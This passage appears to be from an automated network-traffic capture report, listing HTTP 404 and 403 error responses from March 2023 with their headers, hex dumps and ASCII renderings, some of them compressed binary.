20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 
6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:37 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 
6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:41 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 
6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:43 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 
72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:57 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: store_session=6rpf011lk81le4ortol3cdeomh; expires=Mon, 20-Mar-2023 15:02:57 GMT; Max-Age=3600; path=/; SameSite=Laxvary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lN16ox%2Br5XXRwXIdYsLBGGqkexPuhL%2FST9Uig%2BPVl%2FqqoTesqqNrBHCmrEVF03eUkdKlpXjZXTQ1lixA4L5hud8i0QQ4JYvAR56RP%2FOMIL19c%2FkZcECanHunqDJvCuA7JTQ3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aae7eeb09f09bec-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 4d 6b dc 30 10 86 ef fd 15 73 cb 65 d7 8e db a6 14 c7 5d 28 85 92 42 29 a5 b4 b9 8f ad b1 35 ec 58 32 d2 6c bc 6e e9 7f 2f f2 36 c4 c6 e4 10 9d 34 1f 3c f3 6a 5e 54 59 ed e5 f0 0a 00 a0 b2 84 e6 72 9d 43 65 15 3a 7c c7 8e e0 9b 57 f8 ec 4f ce 54 f9 25 fb d4 15 75 5a c6 e9 d4 de 4c 7f 56 99 74 7a 0c 1d bb f2 fa 76 53 19 d0 18 76 5d f9 e6 7a 38 6f ab ad 77 5a 16 af 87 73 5e 64 37 70 47 f2 40 ca 0d ee 3e 06 46 d9 dd 53 30 e8 70 17 d1 c5 7d a4 c0 ed 9a f0 77 15 d9 e2 25 ba d2 e4 7d e4 df 54 be 7d ff 9c b2 fd 48 dc 59 2d 9d 0f 3d ca b6 47 d8 d1 de 5e 7a b6 94 b5 ba a8 c1 bb 6e ab d0 70 1c 04 a7 92 dd 4c ab c5 37 c7 ed a4 91 8d da f2 dd cd f3 33 aa 7c 61 56 95 3f d9 5d 25 c7 16 9e da 62 63 bb 2d 16 f5 61 ed f7 4f 4b 30 a4 fe c9 9f 00 03 81 78 7f 64 d7 41 eb 03 34 fe 24 06 9c 57 a8 09 da 04 cb e0 93 a5 e6 08 6a 09 d0 98 40 31 42 8d 61 85 54 0f e4 e2 29 cc cc 00 bf 7e 7c 05 8e 10 07 12 21 03 8d 0f 81 1a 95 29 83 2f 2d a0 08 90 44 82 16 59 e2 6e 56 d1 a0 5b f1 1e 38 b2 42 42 59 df ff 57 8b 3a 4b 10 76 47 a8 49 fc 98 2d 36 b5 78 62 85 60 03 b5 1f ae ac ea 50 e6 f9 38 8e 59 8f 67 8b 6c 34 6b 7c 9f 5f 1d ee 67 7c a2 dd 25 7c 
5a 5e 95 e3 e3 a2 2f db ad f2 f9 ab fd 03 00 00 ff ff 0d 0a Data Ascii: 197Mk0se](B)5X2ln/64<j^TYrCe:|WOT%uZLVtzvSv]z8owZs^d7pG@>FS0p}w%}T}HY-=G^znpL73|aV?]%bc-aOK0xdA4$Wj@1BaT)~|!)/-DYnV[8BBYW:KvGI-6xb`P8Ygl4k|_g|%|Z^/
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:59 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: store_session=b5ubg1pimmrtda13odvh5k1djt; expires=Mon, 20-Mar-2023 15:02:59 GMT; Max-Age=3600; path=/; SameSite=Laxvary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FZpWqdXl%2B95dX86fsW%2FbnEPwyHo2woLiBMqaCY75qhm2Ln%2BUZDk58feMO70UrTy1NzAEWmnFCwS%2B5xHVfZkv1uK%2FQP%2FmfaG23RFfiTMBRirhVCLpiQrR5p8U7k8oSJE%2BnfXC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aae7efae9825c85-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 4d 6b dc 30 10 86 ef fd 15 73 cb 65 d7 8e db a6 14 c7 5d 28 85 92 42 29 a5 b4 b9 8f ad b1 35 ec 58 32 d2 6c bc 6e e9 7f 2f f2 36 c4 c6 e4 10 9d 34 1f 3c f3 6a 5e 54 59 ed e5 f0 0a 00 a0 b2 84 e6 72 9d 43 65 15 3a 7c c7 8e e0 9b 57 f8 ec 4f ce 54 f9 25 fb d4 15 75 5a c6 e9 d4 de 4c 7f 56 99 74 7a 0c 1d bb f2 fa 76 53 19 d0 18 76 5d f9 e6 7a 38 6f ab ad 77 5a 16 af 87 73 5e 64 37 70 47 f2 40 ca 0d ee 3e 06 46 d9 dd 53 30 e8 70 17 d1 c5 7d a4 c0 ed 9a f0 77 15 d9 e2 25 ba d2 e4 7d e4 df 54 be 7d ff 9c b2 fd 48 dc 59 2d 9d 0f 3d ca b6 47 d8 d1 de 5e 7a b6 94 b5 ba a8 c1 bb 6e ab d0 70 1c 04 a7 92 dd 4c ab c5 37 c7 ed a4 91 8d da f2 dd cd f3 33 aa 7c 61 56 95 3f d9 5d 25 c7 16 9e da 62 63 bb 2d 16 f5 61 ed f7 4f 4b 30 a4 fe c9 9f 00 03 81 78 7f 64 d7 41 eb 03 34 fe 24 06 9c 57 a8 09 da 04 cb e0 93 a5 e6 08 6a 09 d0 98 40 31 42 8d 61 85 54 0f e4 e2 29 cc cc 00 bf 7e 7c 05 8e 10 07 12 21 03 8d 0f 81 1a 95 29 83 2f 2d a0 08 90 44 82 16 59 e2 6e 56 d1 a0 5b f1 1e 38 b2 42 42 59 df ff 57 8b 3a 4b 10 76 47 a8 49 fc 98 2d 36 b5 78 62 85 60 03 b5 1f ae ac ea 50 e6 f9 38 8e 59 8f 67 8b 6c 34 6b 7c 9f 5f 1d ee 67 7c a2 dd 25 
7c 5a 5e 95 e3 e3 a2 2f db ad f2 f9 ab fd 03 00 00 ff ff 0d 0a Data Ascii: 197Mk0se](B)5X2ln/64<j^TYrCe:|WOT%uZLVtzvSv]z8owZs^d7pG@>FS0p}w%}T}HY-=G^znpL73|aV?]%bc-aOK0xdA4$Wj@1BaT)~|!)/-DYnV[8BBYW:KvGI-6xb`P8Ygl4k|_g|%|Z^/
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:03:02 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: store_session=js60vnilvkv6ejsvd5h3pi29in; expires=Mon, 20-Mar-2023 15:03:02 GMT; Max-Age=3600; path=/; SameSite=Laxvary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uo0%2F7jSOBMWcKh2B%2FAPV3T3qmnn0aqPhl79yvZs%2Fyqb1XfmkPXkW0vOMMDAeQD61Oc9bty9koOSbpgWY6%2B%2B4aPsY1%2BAgaXHJdkChd%2BBhgJrdUNxiKaWMy12BUz60VMwzuv%2Bi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aae7f0abe209225-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 4d 6b dc 30 10 86 ef fd 15 73 cb 65 d7 8e db a6 14 c7 5d 28 85 92 42 29 a5 b4 b9 8f ad b1 35 ec 58 32 d2 6c bc 6e e9 7f 2f f2 36 c4 c6 e4 10 9d 34 1f 3c f3 6a 5e 54 59 ed e5 f0 0a 00 a0 b2 84 e6 72 9d 43 65 15 3a 7c c7 8e e0 9b 57 f8 ec 4f ce 54 f9 25 fb d4 15 75 5a c6 e9 d4 de 4c 7f 56 99 74 7a 0c 1d bb f2 fa 76 53 19 d0 18 76 5d f9 e6 7a 38 6f ab ad 77 5a 16 af 87 73 5e 64 37 70 47 f2 40 ca 0d ee 3e 06 46 d9 dd 53 30 e8 70 17 d1 c5 7d a4 c0 ed 9a f0 77 15 d9 e2 25 ba d2 e4 7d e4 df 54 be 7d ff 9c b2 fd 48 dc 59 2d 9d 0f 3d ca b6 47 d8 d1 de 5e 7a b6 94 b5 ba a8 c1 bb 6e ab d0 70 1c 04 a7 92 dd 4c ab c5 37 c7 ed a4 91 8d da f2 dd cd f3 33 aa 7c 61 56 95 3f d9 5d 25 c7 16 9e da 62 63 bb 2d 16 f5 61 ed f7 4f 4b 30 a4 fe c9 9f 00 03 81 78 7f 64 d7 41 eb 03 34 fe 24 06 9c 57 a8 09 da 04 cb e0 93 a5 e6 08 6a 09 d0 98 40 31 42 8d 61 85 54 0f e4 e2 29 cc cc 00 bf 7e 7c 05 8e 10 07 12 21 03 8d 0f 81 1a 95 29 83 2f 2d a0 08 90 44 82 16 59 e2 6e 56 d1 a0 5b f1 1e 38 b2 42 42 59 df ff 57 8b 3a 4b 10 76 47 a8 49 fc 98 2d 36 b5 78 62 85 60 03 b5 1f ae ac ea 50 e6 f9 38 8e 59 8f 67 8b 6c 34 6b 7c 9f 5f 1d ee 67 7c a2 dd 25 
7c 5a 5e 95 e3 e3 a2 2f db ad f2 f9 ab fd 03 00 00 ff ff 03 00 60 33 21 c9 71 03 00 00 0d 0a Data Ascii: 1a1Mk0se](B)5X2ln/64<j^TYrCe:|WOT%uZLVtzvSv]z8owZs^d7pG@>FS0p}w%}T}HY-=G^znpL73|aV?]%bc-aOK0xdA4$Wj@1BaT)~|!)/-DYnV[8BBYW:KvGI-6xb`P8Ygl4k|_g|%|Z^/`3!q
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:03:04 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: store_session=h1a0rvrd3ad2v2fkjh2i9747jt; expires=Mon, 20-Mar-2023 15:03:04 GMT; Max-Age=3600; path=/; SameSite=Laxvary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HSA%2FlSJc7%2FVd9jJLosbmcJq85vgCh2VmyFUQxfDe0To5uzI%2B3WYOmoxJGcQvP9OBlHlY93pAU99anYxqdql2bR2xPfaSbfKWD0kULWUewj0cuVouCqV2q05EdTU2WULMRoFX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aae7f1a881b35f9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 31 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 31 32 70 78 2f 31 2e 35 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 
72 6f 6e 67 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 36 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 Data Ascii: 371<html> <head> <title>Page Not Found</title> <style> body{ margin:0; padding:30px; font:12px/1.5 Helvetica,Arial,Verdana,sans-serif; } h1{ margin:0; font-size:48px; font-weight:normal; line-height:48px; } strong{ display:inline-block; width:65px; } </style> </head> <body>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 20 Mar 2023 14:03:09 GMTContent-Type: text/htmlContent-Length: 146X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfsmx/BVT7iQPnHzz24cypK,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=X-Wix-Request-Id: 1679320989.9124863553616242X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 20 Mar 2023 14:03:13 GMTContent-Type: text/htmlContent-Length: 146X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMc64WE2N2IwUTo5CycBLugP,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=X-Wix-Request-Id: 1679320993.082625068665016359X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
